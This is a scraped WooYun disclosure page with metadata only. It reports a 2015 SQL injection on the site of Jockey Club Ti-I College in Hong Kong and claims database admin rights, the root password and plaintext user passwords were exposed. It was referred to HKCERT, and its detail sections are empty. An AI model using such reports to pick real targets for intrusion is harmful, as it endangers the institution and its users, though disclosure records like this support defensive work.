厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157374

漏洞标题：Jockey Club Ti-I College主站存在SQL注射漏洞（DBA权限+root密码+1000多W网站访问记录+用户明文密码）（香港地區）

相关厂商：Jockey Club Ti-I College

漏洞作者： 路人甲

提交时间：2015-12-03 11:27

修复时间：2015-12-08 11:28

公开时间：2015-12-08 11:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0157374"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云